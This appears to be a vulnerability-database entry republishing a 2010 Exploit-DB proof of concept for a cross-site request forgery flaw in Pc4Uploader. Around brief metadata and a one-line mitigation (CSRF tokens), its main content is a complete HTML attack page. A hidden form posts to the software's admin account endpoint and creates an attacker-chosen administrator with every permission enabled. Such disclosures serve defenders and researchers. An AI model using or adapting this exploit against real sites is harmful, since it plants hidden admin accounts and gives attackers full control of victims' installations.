pc4uploader [XSRF] Add Admin Exploit

vendor:

Pc4Uploader

by:

RENO

8,8

CVSS

HIGH

Cross-Site Request Forgery (XSRF)

352

CWE

Product Name: Pc4Uploader

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

pc4uploader [XSRF] Add Admin Exploit

This exploit allows an attacker to add an admin account to the Pc4Uploader software. The attacker can set the username, password, and email address of the new admin account. The attacker can also set the permissions of the new admin account, such as setting the account to have full access to the software.

Mitigation:

The software should implement a CSRF protection mechanism, such as using a CSRF token, to prevent unauthorized requests.

Source

Exploit-DB raw data:

# Exploit Title: pc4uploader [XSRF] Add Admin Exploit# Date: 27-08-2010# Author: RENO
# TeaM : SauDi ViRuS TeaM
# SiTe: WwW.Sa-ViRuS.CoM
# Software Link: http://www.pc4arb.com/product-10.html

<html>
<title>[SvT]</title>
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
<p
 align="left"><font size="5" 
color="#FFFFFF"><b>                                
 
               
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin 
Exploit<br>
                                                                  
    
Author : RENO<br>
                                                         
     TeaM : SauDi ViRuS TeaM<br>
                                                           
    
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
                                                       
      
Email : R7e@HoTMaiL.coM</font></b></p>
<p align="center"> </p>
<p align="center"> </p>

<svt>
<center>

<form method="POST" name="form" action="http://localhost/path/admin/index.php?mod=account&add=saveadmin">
<input type="hidden" name="username" value="R3NO"/>
<input type="hidden" name="password" value="SauDi_ViRuS_TeaM"/>
<input type="hidden" name="email" value="R7e@HoTMaiL.CoM"/>
<input type="hidden" name="setting_rols" value="1"/>
<input type="hidden" name="member_rols" value="1"/>
<input type="hidden" name="files_rols" value="1"/>
<input type="hidden" name="msg_rols" value="1"/>
<input type="hidden" name="news_rols" value="1"/>
<input type="hidden" name="advs_rols" value="1"/>
<input type="hidden" name="links_rols" value="1"/>
<input type="hidden" name="support_rols" value="1"/>
<input type=submit value="Submit">
</p>

</form>
</svt>


</center>
</html>